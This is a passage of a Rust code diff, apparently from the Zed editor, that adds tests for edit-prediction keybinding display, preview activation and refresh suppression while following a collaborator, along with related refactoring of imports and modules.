+ })
+ {
+ continue;
+ }
+
let prev_row = row - 1;
end = Some(Point::new(
prev_row,
@@ -145,7 +145,7 @@ impl Editor {
_: &Window,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let Some(project) = self.project.as_ref() else {
@@ -147,7 +147,7 @@ impl Editor {
for_buffer: Option<BufferId>,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let Some(project) = self.project.clone() else {
@@ -1,17 +1,34 @@
use edit_prediction_types::{
EditPredictionDelegate, EditPredictionIconSet, PredictedCursorPosition,
};
-use gpui::{Entity, KeyBinding, Modifiers, prelude::*};
+use gpui::{
+ Entity, KeyBinding, KeybindingKeystroke, Keystroke, Modifiers, NoAction, Task, prelude::*,
+};
use indoc::indoc;
-use multi_buffer::{Anchor, MultiBufferSnapshot, ToPoint};
-use std::{ops::Range, sync::Arc};
+use language::EditPredictionsMode;
+use language::{Buffer, CodeLabel};
+use multi_buffer::{Anchor, ExcerptId, MultiBufferSnapshot, ToPoint};
+use project::{Completion, CompletionResponse, CompletionSource};
+use std::{
+ ops::Range,
+ rc::Rc,
+ sync::{
+ Arc,
+ atomic::{self, AtomicUsize},
+ },
+};
use text::{Point, ToOffset};
use ui::prelude::*;
use crate::{
- AcceptEditPrediction, EditPrediction, MenuEditPredictionsPolicy, editor_tests::init_test,
+ AcceptEditPrediction, CompletionContext, CompletionProvider, EditPrediction,
+ EditPredictionKeybindAction, EditPredictionKeybindSurface, MenuEditPredictionsPolicy,
+ ShowCompletions,
+ editor_tests::{init_test, update_test_language_settings},
test::editor_test_context::EditorTestContext,
};
+use rpc::proto::PeerId;
+use workspace::CollaboratorId;
#[gpui::test]
async fn test_edit_prediction_insert(cx: &mut gpui::TestAppContext) {
@@ -359,6 +376,60 @@ async fn test_edit_prediction_jump_disabled_for_non_zed_providers(cx: &mut gpui:
});
}
+#[gpui::test]
+async fn test_edit_prediction_refresh_suppressed_while_following(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+
+ cx.update_editor(|editor, window, cx| {
+ editor.refresh_edit_prediction(false, false, window, cx);
+ editor.update_visible_edit_prediction(window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 1
+ );
+ cx.editor(|editor, _, _| {
+ assert!(editor.active_edit_prediction.is_some());
+ });
+
+ cx.update_editor(|editor, window, cx| {
+ editor.leader_id = Some(CollaboratorId::PeerId(PeerId::default()));
+ editor.refresh_edit_prediction(false, false, window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 1
+ );
+ cx.editor(|editor, _, _| {
+ assert!(editor.active_edit_prediction.is_none());
+ });
+
+ cx.update_editor(|editor, window, cx| {
+ editor.leader_id = None;
+ editor.refresh_edit_prediction(false, false, window, cx);
+ });
+
+ assert_eq!(
+ provider.read_with(&cx.cx, |provider, _| {
+ provider.refresh_count.load(atomic::Ordering::SeqCst)
+ }),
+ 2
+ );
+}
+
#[gpui::test]
async fn test_edit_prediction_preview_cleanup_on_toggle_off(cx: &mut gpui::TestAppContext) {
init_test(cx, |_| {});
@@ -416,6 +487,537 @@ async fn test_edit_prediction_preview_cleanup_on_toggle_off(cx: &mut gpui::TestA
});
}
+#[gpui::test]
+async fn test_edit_prediction_preview_activates_when_prediction_arrives_with_modifier_held(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+ update_test_language_settings(cx, &|settings| {
+ settings.edit_predictions.get_or_insert_default().mode = Some(EditPredictionsMode::Subtle);
+ });
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ cx.editor(|editor, _, _| {
+ assert!(!editor.has_active_edit_prediction());
+ assert!(!editor.edit_prediction_preview_is_active());
+ });
+
+ let preview_modifiers = cx.update_editor(|editor, window, cx| {
+ *editor
+ .preview_edit_prediction_keystroke(window, cx)
+ .unwrap()
+ .modifiers()
+ });
+
+ cx.simulate_modifiers_change(preview_modifiers);
+ cx.run_until_parked();
+
+ cx.editor(|editor, _, _| {
+ assert!(!editor.has_active_edit_prediction());
+ assert!(editor.edit_prediction_preview_is_active());
+ });
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.set_menu_edit_predictions_policy(MenuEditPredictionsPolicy::ByProvider);
+ editor.update_visible_edit_prediction(window, cx)
+ });
+
+ cx.editor(|editor, _, _| {
+ assert!(editor.has_active_edit_prediction());
+ assert!(
+ editor.edit_prediction_preview_is_active(),
+ "prediction preview should activate immediately when the prediction arrives while the preview modifier is still held",
+ );
+ });
+}
+
+fn load_default_keymap(cx: &mut gpui::TestAppContext) {
+ cx.update(|cx| {
+ cx.bind_keys(
+ settings::KeymapFile::load_asset_allow_partial_failure(
+ settings::DEFAULT_KEYMAP_PATH,
+ cx,
+ )
+ .expect("failed to load default keymap"),
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_inline_edit_prediction_keybind_selection_cases(cx: &mut gpui::TestAppContext) {
+ enum InlineKeybindState {
+ Normal,
+ ShowingCompletions,
+ InLeadingWhitespace,
+ ShowingCompletionsAndLeadingWhitespace,
+ }
+
+ enum ExpectedKeystroke {
+ DefaultAccept,
+ DefaultPreview,
+ Literal(&'static str),
+ }
+
+ struct InlineKeybindCase {
+ name: &'static str,
+ use_default_keymap: bool,
+ mode: EditPredictionsMode,
+ extra_bindings: Vec<KeyBinding>,
+ state: InlineKeybindState,
+ expected_accept_keystroke: ExpectedKeystroke,
+ expected_preview_keystroke: ExpectedKeystroke,
+ expected_displayed_keystroke: ExpectedKeystroke,
+ }
+
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+ let mut default_cx = EditorTestContext::new(cx).await;
+ let provider = default_cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut default_cx);
+ default_cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42")], &mut default_cx);
+ default_cx
+ .update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ let (default_accept_keystroke, default_preview_keystroke) =
+ default_cx.update_editor(|editor, window, cx| {
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::Inline,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .expect("default inline edit prediction should have an accept binding")
+ .clone();
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .expect("default inline edit prediction should have a preview binding")
+ .clone();
+ (accept_keystroke, preview_keystroke)
+ });
+
+ let cases = [
+ InlineKeybindCase {
+ name: "default setup prefers tab over alt-tab for accept",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: Vec::new(),
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultAccept,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultAccept,
+ },
+ InlineKeybindCase {
+ name: "subtle mode displays preview binding inline",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Subtle,
+ extra_bindings: Vec::new(),
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultPreview,
+ },
+ InlineKeybindCase {
+ name: "removing default tab binding still displays tab",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "tab",
+ NoAction,
+ Some("Editor && edit_prediction && edit_prediction_mode == eager"),
+ )],
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_preview_keystroke: ExpectedKeystroke::DefaultPreview,
+ expected_displayed_keystroke: ExpectedKeystroke::DefaultPreview,
+ },
+ InlineKeybindCase {
+ name: "custom-only rebound accept key uses replacement key",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction"),
+ )],
+ state: InlineKeybindState::Normal,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "showing completions restores conflict-context binding",
+ use_default_keymap: true,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && showing_completions"),
+ )],
+ state: InlineKeybindState::ShowingCompletions,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "leading whitespace restores conflict-context binding",
+ use_default_keymap: false,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && in_leading_whitespace"),
+ )],
+ state: InlineKeybindState::InLeadingWhitespace,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ InlineKeybindCase {
+ name: "showing completions and leading whitespace restore combined conflict binding",
+ use_default_keymap: false,
+ mode: EditPredictionsMode::Eager,
+ extra_bindings: vec![KeyBinding::new(
+ "ctrl-enter",
+ AcceptEditPrediction,
+ Some("Editor && edit_prediction && showing_completions && in_leading_whitespace"),
+ )],
+ state: InlineKeybindState::ShowingCompletionsAndLeadingWhitespace,
+ expected_accept_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_preview_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ expected_displayed_keystroke: ExpectedKeystroke::Literal("ctrl-enter"),
+ },
+ ];
+
+ for case in cases {
+ init_test(cx, |_| {});
+ if case.use_default_keymap {
+ load_default_keymap(cx);
+ }
+ update_test_language_settings(cx, &|settings| {
+ settings.edit_predictions.get_or_insert_default().mode = Some(case.mode);
+ });
+
+ if !case.extra_bindings.is_empty() {
+ cx.update(|cx| cx.bind_keys(case.extra_bindings.clone()));
+ }
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+
+ match case.state {
+ InlineKeybindState::Normal | InlineKeybindState::ShowingCompletions => {
+ cx.set_state("let x = ˇ;");
+ }
+ InlineKeybindState::InLeadingWhitespace
+ | InlineKeybindState::ShowingCompletionsAndLeadingWhitespace => {
+ cx.set_state(indoc! {"
+ fn main() {
+ ˇ
+ }
+ "});
+ }
+ }
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ if matches!(
+ case.state,
+ InlineKeybindState::ShowingCompletions
+ | InlineKeybindState::ShowingCompletionsAndLeadingWhitespace
+ ) {
+ assign_editor_completion_menu_provider(&mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.show_completions(&ShowCompletions, window, cx);
+ });
+ cx.run_until_parked();
+ }
+
+ cx.update_editor(|editor, window, cx| {
+ assert!(
+ editor.has_active_edit_prediction(),
+ "case '{}' should have an active edit prediction",
+ case.name
+ );
+
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::Inline,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have an accept binding", case.name));
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a preview binding", case.name));
+ let displayed_keystroke = keybind_display
+ .displayed_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a displayed binding", case.name));
+
+ let expected_accept_keystroke = match case.expected_accept_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+ let expected_preview_keystroke = match case.expected_preview_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+ let expected_displayed_keystroke = match case.expected_displayed_keystroke {
+ ExpectedKeystroke::DefaultAccept => default_accept_keystroke.clone(),
+ ExpectedKeystroke::DefaultPreview => default_preview_keystroke.clone(),
+ ExpectedKeystroke::Literal(keystroke) => KeybindingKeystroke::from_keystroke(
+ Keystroke::parse(keystroke).expect("expected test keystroke to parse"),
+ ),
+ };
+
+ assert_eq!(
+ accept_keystroke, &expected_accept_keystroke,
+ "case '{}' selected the wrong accept binding",
+ case.name
+ );
+ assert_eq!(
+ preview_keystroke, &expected_preview_keystroke,
+ "case '{}' selected the wrong preview binding",
+ case.name
+ );
+ assert_eq!(
+ displayed_keystroke, &expected_displayed_keystroke,
+ "case '{}' selected the wrong displayed binding",
+ case.name
+ );
+
+ if matches!(case.mode, EditPredictionsMode::Subtle) {
+ assert!(
+ editor.edit_prediction_requires_modifier(),
+ "case '{}' should require a modifier",
+ case.name
+ );
+ }
+ });
+ }
+}
+
+#[gpui::test]
+async fn test_tab_accepts_edit_prediction_over_completion(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+ cx.set_state("let x = ˇ;");
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| editor.update_visible_edit_prediction(window, cx));
+
+ assert_editor_active_edit_completion(&mut cx, |_, edits| {
+ assert_eq!(edits.len(), 1);
+ assert_eq!(edits[0].1.as_ref(), "42");
+ });
+
+ cx.simulate_keystroke("tab");
+ cx.run_until_parked();
+
+ cx.assert_editor_state("let x = 42ˇ;");
+}
+
+#[gpui::test]
+async fn test_cursor_popover_edit_prediction_keybind_cases(cx: &mut gpui::TestAppContext) {
+ enum CursorPopoverPredictionKind {
+ SingleLine,
+ MultiLine,
+ SingleLineWithPreview,
+ MultiLineWithPreview,
+ DeleteSingleNewline,
+ StaleSingleLineAfterMultiLine,
+ }
+
+ struct CursorPopoverCase {
+ name: &'static str,
+ prediction_kind: CursorPopoverPredictionKind,
+ expected_action: EditPredictionKeybindAction,
+ }
+
+ let cases = [
+ CursorPopoverCase {
+ name: "single line prediction uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::SingleLine,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "multi line prediction uses preview action",
+ prediction_kind: CursorPopoverPredictionKind::MultiLine,
+ expected_action: EditPredictionKeybindAction::Preview,
+ },
+ CursorPopoverCase {
+ name: "single line prediction with preview still uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::SingleLineWithPreview,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "multi line prediction with preview uses preview action",
+ prediction_kind: CursorPopoverPredictionKind::MultiLineWithPreview,
+ expected_action: EditPredictionKeybindAction::Preview,
+ },
+ CursorPopoverCase {
+ name: "single line newline deletion uses accept action",
+ prediction_kind: CursorPopoverPredictionKind::DeleteSingleNewline,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ CursorPopoverCase {
+ name: "stale multi line prediction does not force preview action",
+ prediction_kind: CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine,
+ expected_action: EditPredictionKeybindAction::Accept,
+ },
+ ];
+
+ for case in cases {
+ init_test(cx, |_| {});
+ load_default_keymap(cx);
+
+ let mut cx = EditorTestContext::new(cx).await;
+ let provider = cx.new(|_| FakeEditPredictionDelegate::default());
+ assign_editor_completion_provider(provider.clone(), &mut cx);
+
+ match case.prediction_kind {
+ CursorPopoverPredictionKind::SingleLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::MultiLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42\n43")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::SingleLineWithPreview => {
+ cx.set_state("let x = ˇ;");
+ propose_edits_with_preview(&provider, vec![(8..8, "42")], &mut cx).await;
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::MultiLineWithPreview => {
+ cx.set_state("let x = ˇ;");
+ propose_edits_with_preview(&provider, vec![(8..8, "42\n43")], &mut cx).await;
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::DeleteSingleNewline => {
+ cx.set_state(indoc! {"
+ fn main() {
+ let value = 1;
+ ˇprintln!(\"done\");
+ }
+ "});
+ propose_edits(
+ &provider,
+ vec![(Point::new(1, 18)..Point::new(2, 17), "")],
+ &mut cx,
+ );
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine => {
+ cx.set_state("let x = ˇ;");
+ propose_edits(&provider, vec![(8..8, "42\n43")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ cx.update_editor(|editor, _window, cx| {
+ assert!(editor.active_edit_prediction.is_some());
+ assert!(editor.stale_edit_prediction_in_menu.is_none());
+ editor.take_active_edit_prediction(cx);
+ assert!(editor.active_edit_prediction.is_none());
+ assert!(editor.stale_edit_prediction_in_menu.is_some());
+ });
+
+ propose_edits(&provider, vec![(8..8, "42")], &mut cx);
+ cx.update_editor(|editor, window, cx| {
+ editor.update_visible_edit_prediction(window, cx)
+ });
+ }
+ }
+
+ cx.update_editor(|editor, window, cx| {
+ assert!(
+ editor.has_active_edit_prediction(),
+ "case '{}' should have an active edit prediction",
+ case.name
+ );
+
+ let keybind_display = editor.edit_prediction_keybind_display(
+ EditPredictionKeybindSurface::CursorPopoverExpanded,
+ window,
+ cx,
+ );
+ let accept_keystroke = keybind_display
+ .accept_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have an accept binding", case.name));
+ let preview_keystroke = keybind_display
+ .preview_keystroke
+ .as_ref()
+ .unwrap_or_else(|| panic!("case '{}' should have a preview binding", case.name));
+
+ assert_eq!(
+ keybind_display.action, case.expected_action,
+ "case '{}' selected the wrong cursor popover action",
+ case.name
+ );
+ assert_eq!(
+ accept_keystroke.key(),
+ "tab",
+ "case '{}' selected the wrong accept binding",
+ case.name
+ );
+ assert!(
+ preview_keystroke.modifiers().modified(),
+ "case '{}' should use a modified preview binding",
+ case.name
+ );
+
+ if matches!(
+ case.prediction_kind,
+ CursorPopoverPredictionKind::StaleSingleLineAfterMultiLine
+ ) {
+ assert!(
+ editor.stale_edit_prediction_in_menu.is_none(),
+ "case '{}' should clear stale menu state",
+ case.name
+ );
+ }
+ });
+ }
+}
+
fn assert_editor_active_edit_completion(
cx: &mut EditorTestContext,
assert: impl FnOnce(MultiBufferSnapshot, &Vec<(Range<Anchor>, Arc<str>)>),
@@ -466,6 +1068,44 @@ fn propose_edits<T: ToOffset>(
propose_edits_with_cursor_position(provider, edits, None, cx);
}
+async fn propose_edits_with_preview<T: ToOffset + Clone>(
+ provider: &Entity<FakeEditPredictionDelegate>,
+ edits: Vec<(Range<T>, &str)>,
+ cx: &mut EditorTestContext,
+) {
+ let snapshot = cx.buffer_snapshot();
+ let edits = edits
+ .into_iter()
+ .map(|(range, text)| {
+ let anchor_range =
+ snapshot.anchor_after(range.start.clone())..snapshot.anchor_before(range.end);
+ (anchor_range, Arc::<str>::from(text))
+ })
+ .collect::<Vec<_>>();
+
+ let preview_edits = edits
+ .iter()
+ .map(|(range, text)| (range.clone(), text.clone()))
+ .collect::<Arc<[_]>>();
+
+ let edit_preview = cx
+ .buffer(|buffer: &Buffer, app| buffer.preview_edits(preview_edits, app))
+ .await;
+
+ let provider_edits = edits.into_iter().collect();
+
+ cx.update(|_, cx| {
+ provider.update(cx, |provider, _| {
+ provider.set_edit_prediction(Some(edit_prediction_types::EditPrediction::Local {
+ id: None,
+ edits: provider_edits,
+ cursor_position: None,
+ edit_preview: Some(edit_preview),
+ }))
+ })
+ });
+}
+
fn propose_edits_with_cursor_position<T: ToOffset>(
provider: &Entity<FakeEditPredictionDelegate>,
edits: Vec<(Range<T>, &str)>,
@@ -532,6 +1172,12 @@ fn assign_editor_completion_provider(
})
}
+fn assign_editor_completion_menu_provider(cx: &mut EditorTestContext) {
+ cx.update_editor(|editor, _, _| {
+ editor.set_completion_provider(Some(Rc::new(FakeCompletionMenuProvider)));
+ });
+}
+
fn propose_edits_non_zed<T: ToOffset>(
provider: &Entity<FakeNonZedEditPredictionDelegate>,
edits: Vec<(Range<T>, &str)>,
@@ -564,9 +1210,58 @@ fn assign_editor_completion_provider_non_zed(
})
}
+struct FakeCompletionMenuProvider;
+
+impl CompletionProvider for FakeCompletionMenuProvider {
+ fn completions(
+ &self,
+ _excerpt_id: ExcerptId,
+ _buffer: &Entity<Buffer>,
+ _buffer_position: text::Anchor,
+ _trigger: CompletionContext,
+ _window: &mut Window,
+ _cx: &mut Context<crate::Editor>,
+ ) -> Task<anyhow::Result<Vec<CompletionResponse>>> {
+ let completion = Completion {
+ replace_range: text::Anchor::MIN..text::Anchor::MAX,
+ new_text: "fake_completion".to_string(),
+ label: CodeLabel::plain("fake_completion".to_string(), None),
+ documentation: None,
+ source: CompletionSource::Custom,
+ icon_path: None,
+ match_start: None,
+ snippet_deduplication_key: None,
+ insert_text_mode: None,
+ confirm: None,
+ };
+
+ Task::ready(Ok(vec![CompletionResponse {
+ completions: vec![completion],
+ display_options: Default::default(),
+ is_incomplete: false,
+ }]))
+ }
+
+ fn is_completion_trigger(
+ &self,
+ _buffer: &Entity<Buffer>,
+ _position: language::Anchor,
+ _text: &str,
+ _trigger_in_words: bool,
+ _cx: &mut Context<crate::Editor>,
+ ) -> bool {
+ false
+ }
+
+ fn filter_completions(&self) -> bool {
+ false
+ }
+}
+
#[derive(Default, Clone)]
pub struct FakeEditPredictionDelegate {
pub completion: Option<edit_prediction_types::EditPrediction>,
+ pub refresh_count: Arc<AtomicUsize>,
}
impl FakeEditPredictionDelegate {
@@ -619,6 +1314,7 @@ impl EditPredictionDelegate for FakeEditPredictionDelegate {
_debounce: bool,
_cx: &mut gpui::Context<Self>,
) {
+ self.refresh_count.fetch_add(1, atomic::Ordering::SeqCst);
}
fn accept(&mut self, _cx: &mut gpui::Context<Self>) {}
@@ -35,13 +35,13 @@ mod lsp_ext;
mod mouse_context_menu;
pub mod movement;
mod persistence;
+mod runnables;
mod rust_analyzer_ext;
pub mod scroll;
mod selections_collection;
pub mod semantic_tokens;
mod split;
pub mod split_editor_view;
-pub mod tasks;
#[cfg(test)]
mod code_completion_tests;
@@ -105,7 +105,7 @@ use edit_prediction_types::{
EditPredictionGranularity, SuggestionDisplayType,
};
use editor_settings::{GoToDefinitionFallback, Minimap as MinimapSettings};
-use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line};
+use element::{LineWithInvisibles, PositionMap, layout_line};
use futures::{
FutureExt,
future::{self, Shared, join},
@@ -133,8 +133,8 @@ use language::{
BufferSnapshot, Capability, CharClassifier, CharKind, CharScopeContext, CodeLabel, CursorShape,
DiagnosticEntryRef, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, IndentKind,
IndentSize, Language, LanguageName, LanguageRegistry, LanguageScope, LocalFile, OffsetRangeExt,
- OutlineItem, Point, Runnable, Selection, SelectionGoal, TextObject, TransactionId,
- TreeSitterOptions, WordsQuery,
+ OutlineItem, Point, Selection, SelectionGoal, TextObject, TransactionId, TreeSitterOptions,
+ WordsQuery,
language_settings::{
self, LanguageSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode,
all_language_settings, language_settings,
@@ -153,12 +153,12 @@ use multi_buffer::{
ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow,
};
use parking_lot::Mutex;
-use persistence::DB;
+use persistence::EditorDb;
use project::{
BreakpointWithPosition, CodeAction, Completion, CompletionDisplayOptions, CompletionIntent,
CompletionResponse, CompletionSource, DisableAiSettings, DocumentHighlight, InlayHint, InlayId,
InvalidationStrategy, Location, LocationLink, LspAction, PrepareRenameResponse, Project,
- ProjectItem, ProjectPath, ProjectTransaction, TaskSourceKind,
+ ProjectItem, ProjectPath, ProjectTransaction,
debugger::{
breakpoint_store::{
Breakpoint, BreakpointEditAction, BreakpointSessionState, BreakpointState,
@@ -200,7 +200,7 @@ use std::{
sync::Arc,
time::{Duration, Instant},
};
-use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables};
+use task::TaskVariables;
use text::{BufferId, FromAnchor, OffsetUtf16, Rope, ToOffset as _, ToPoint as _};
use theme::{
AccentColors, ActiveTheme, GlobalTheme, PlayerColor, StatusColors, SyntaxTheme, Theme,
@@ -209,6 +209,7 @@ use theme::{
use ui::{
Avatar, ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape,
IconName, IconSize, Indicator, Key, Tooltip, h_flex, prelude::*, scrollbars::ScrollbarAutoHide,
+ utils::WithRemSize,
};
use ui_input::ErasedEditor;
use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc};
@@ -216,10 +217,11 @@ use workspace::{
CollaboratorId, Item as WorkspaceItem, ItemId, ItemNavHistory, NavigationEntry, OpenInTerminal,
OpenTerminal, Pane, RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection,
TabBarSettings, Toast, ViewId, Workspace, WorkspaceId, WorkspaceSettings,
- item::{BreadcrumbText, ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions},
+ item::{ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions},
notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt},
searchable::SearchEvent,
};
+pub use zed_actions::editor::RevealInFileManager;
use zed_actions::editor::{MoveDown, MoveUp};
use crate::{
@@ -230,6 +232,7 @@ use crate::{
InlineValueCache,
inlay_hints::{LspInlayHintData, inlay_hint_settings},
},
+ runnables::{ResolvedTasks, RunnableData, RunnableTasks},
scroll::{ScrollOffset, ScrollPixelOffset},
selections_collection::resolve_selections_wrapping_blocks,
semantic_tokens::SemanticTokenState,
@@ -254,7 +257,6 @@ pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration:
pub const LSP_REQUEST_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(50);
pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction";
-pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict";
pub(crate) const MINIMAP_FONT_SIZE: AbsoluteLength = AbsoluteLength::Pixels(px(2.));
pub type RenderDiffHunkControlsFn = Arc<
@@ -699,6 +701,30 @@ pub enum EditPredictionPreview {
},
}
+#[derive(Copy, Clone, Eq, PartialEq)]
+enum EditPredictionKeybindSurface {
+ Inline,
+ CursorPopoverCompact,
+ CursorPopoverExpanded,
+}
+
+#[derive(Copy, Clone, Eq, PartialEq, Debug)]
+enum EditPredictionKeybindAction {
+ Accept,
+ Preview,
+}
+
+struct EditPredictionKeybindDisplay {
+ #[cfg(test)]
+ accept_keystroke: Option<gpui::KeybindingKeystroke>,
+ #[cfg(test)]
+ preview_keystroke: Option<gpui::KeybindingKeystroke>,
+ displayed_keystroke: Option<gpui::KeybindingKeystroke>,
+ action: EditPredictionKeybindAction,
+ missing_accept_keystroke: bool,
+ show_hold_label: bool,
+}
+
impl EditPredictionPreview {
pub fn released_too_fast(&self) -> bool {
match self {
@@ -856,37 +882,6 @@ impl BufferSerialization {
}
}
